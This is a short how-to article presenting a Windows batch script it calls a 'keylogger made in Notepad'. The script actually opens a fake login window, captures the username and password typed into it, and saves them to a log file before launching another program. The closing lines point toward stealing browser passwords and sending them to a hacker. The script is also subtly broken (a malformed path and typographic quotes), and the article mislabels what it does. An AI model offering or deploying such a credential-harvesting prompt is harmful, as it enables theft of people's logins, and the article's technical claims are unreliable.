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Make own Keylogger in Notepad

What is a keylogger? At its most basic definition, a keylogger is a function which records or keystrokes on a computer.The main objective of keyloggers is to interfere in the chain of events that happen when a key is pressed and when the data is displayed on the monitor as a result of a keystroke

How to make a Keylogger in Notepad

To make a Keylogger in Notepad you don’t need any software or programming knowledge. All you need is Notepad which is a simple text Editor and it is available in all versions of Windows.
 Step 1: Go to your C directory or partition or Local Disk (C:) and look for a folder named as Logs if it doesn’t exist then Create a New Folder and give it Name as Logs.
How to make a keylogger in notepad

Step 2: Go to StartMenu and open Notepad. Copy and paste the keylogger source code in the Notepad.
@echo off
color a
title Login
echo Please Enter Your Email Address And Password
cd “C:Logs”
set /p user=Username:
set /p pass=Password:
echo Username=”%user%” Password=”%pass%” >> Log.txt
start >>Program Here<<
Like this one:

Step 3: Go to the File menu and Choose Save As.

 Step 4: Give it a name as Logs.bat and save it in the Logs folder which is located on the Local Disk (C:)

Step 5: To test the Keylogger open Logs.bat file and type any Username and Password.

Step 6: Go to the Logs folder you will find a log.txt file open it to confirm your username and password.

That’s it now you know, How to make a Keylogger in Notepad although it is a simple keylogger but still this keylogger is enough to give you an idea how your keystrokes can be stored in a text file. An advance keylogger will run with Browsers and stores usernames, and passwords from sites like facebook and even it can send information automatically to the hacker.